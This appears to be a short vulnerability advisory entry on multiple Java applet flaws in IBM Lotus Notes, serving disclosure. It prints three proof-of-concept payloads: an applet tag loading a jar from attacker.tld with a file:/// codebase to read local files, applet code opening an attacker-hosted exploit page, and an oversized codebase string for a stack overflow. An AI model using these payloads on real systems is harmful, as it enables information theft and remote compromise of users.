IBM Lotus Notes Multiple Java Applet Vulnerabilities

IBM Lotus Notes Multiple Java Applet Vulnerabilities

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

The following proofs of concept are available:

Information disclosure:
<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>

Arbitrary browser opening:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}

Stack-based buffer overflow:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>